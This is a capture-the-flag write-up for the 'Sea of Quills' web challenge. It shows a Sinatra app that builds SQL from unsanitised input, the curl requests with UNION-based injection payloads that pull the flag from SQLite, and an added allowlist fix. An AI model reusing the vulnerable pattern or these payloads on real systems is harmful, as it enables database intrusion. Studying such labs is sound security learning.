Sea of Quills
Category: Web
70 points
Come check out our finest selection of quills!
app.rb
Author: JoshDaBosh
app.rb
require 'sinatra'
require 'sqlite3'

set :bind, "0.0.0.0"
set :port, 4567

get '/' do
  db = SQLite3::Database.new "quills.db"
  @row = db.execute( "select * from quills" )
  erb :index
end

get '/quills' do
  erb :quills
end

post '/quills' do
  db = SQLite3::Database.new "quills.db"
  cols = params[:cols]
  lim = params[:limit]
  off = params[:offset]

  # Denylist of characters only; spaces, commas and SQL keywords are not on it.
  blacklist = ["-", "/", ";", "'", "\""]
  blacklist.each { |word|
    if cols.include? word
      return "beep boop sqli detected!"
    end
  }

  # limit/offset must be digits (note: ^ and $ are line anchors in Ruby regexes)
  if !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
    return "bad, no quills for you!"
  end

  # cols is formatted straight into the statement: this is the injection point
  @row = db.execute("select %s from quills limit %s offset %s" % [cols, lim, off])
  p @row
  erb :specific
end
Solution
To look around…
curl 'https://seaofquills.2021.chall.actf.co/quills' --data-raw 'limit=100&offset=0&cols=tbl_name%2Cname%2Csql%20from%20sqlite_master%20union%20select%20url%2Cdesc%2Cname'
Honey in the output:
<img src="flagtable" class="w3 h3">
<li class="pb5 pl3">flagtable <ul><li>CREATE TABLE flagtable (
flag varchar(30)
)</li></ul></li><br />
Let's take a closer look…
curl 'https://seaofquills.2021.chall.actf.co/quills' --data-raw 'limit=100&offset=0&cols=flag%2Cflag%2Cflag%20from%20flagtable%20union%20select%20url%2Cdesc%2Cname'
<img src="actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}" class="w3 h3">
<li class="pb5 pl3">actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df} <ul><li>actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}</li></ul></li><br />
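The root cause, shown as an added example that is not part of the challenge's app.rb or of this writeup: the denylist from the challenge reproduced beside an allowlist check on column names, with limit and offset bound as integer parameters instead of being formatted into the statement. The column names url, desc and name are the ones the union above selects; the allowlist itself, the function names and the constructed probe string are assumptions for illustration. It runs offline and touches no database.

```ruby
# Added example, not part of the challenge's app.rb: the challenge's filter
# beside an allowlist-based alternative, run on constructed input.

# The challenge's denylist, reproduced for comparison.
BLACKLIST = ["-", "/", ";", "'", "\""].freeze

# Mirrors app.rb: the request is allowed unless a listed character appears.
# Spaces, commas and SQL keywords are not listed, so "from ... union select"
# is never rejected.
def blacklist_allows?(cols)
  BLACKLIST.none? { |word| cols.include?(word) }
end

# Assumed set of real column names in the quills table (url, desc and name
# are the columns the writeup's union selects; the list is an assumption).
ALLOWED_COLS = %w[url desc name].freeze

# Allowlist check: the parameter must be a comma-separated list of known
# column names and nothing else. Returns the cleaned names, or nil to reject.
def allowlist_cols(cols)
  return nil if cols.nil?
  requested = cols.split(",").map(&:strip)
  return nil if requested.empty?
  return nil unless requested.all? { |c| ALLOWED_COLS.include?(c) }
  requested
end

# The challenge's digit check, reproduced: ^ and $ are line anchors in Ruby,
# so a value such as "10\nanything" still passes.
def challenge_digits_check?(value)
  /^[0-9]+$/.match?(value)
end

# Same check anchored to the whole string with \A and \z.
def digits_only?(value)
  !value.nil? && /\A[0-9]+\z/.match?(value)
end

# Builds the statement with identifiers drawn from the allowlist and
# limit/offset as bound parameters (the [sql, binds] pair that
# SQLite3::Database#execute accepts). Returns nil when the request is rejected.
def build_query(cols, lim, off)
  names = allowlist_cols(cols)
  return nil if names.nil?
  return nil unless digits_only?(lim) && digits_only?(off)
  sql = "select #{names.join(', ')} from quills limit ? offset ?"
  [sql, [lim.to_i, off.to_i]]
end

if __FILE__ == $0
  # Constructed probe: the cols value from the first request in the writeup.
  probe = "tbl_name,name,sql from sqlite_master union select url,desc,name"
  puts "denylist allows probe:  #{blacklist_allows?(probe)}"      # true
  puts "allowlist allows probe: #{!allowlist_cols(probe).nil?}"   # false
  p build_query("url, name", "10", "0")
  # => ["select url, name from quills limit ? offset ?", [10, 0]]
end
```

The point of the comparison: the denylist asks "does the input contain a bad character?", which is answered by finding a payload built only from characters it forgot, while the allowlist asks "is the input one of the things we expect?", which leaves nothing to enumerate. The same reasoning applies to the anchors: \A and \z describe the whole value, ^ and $ only a line of it.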
Flag
actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}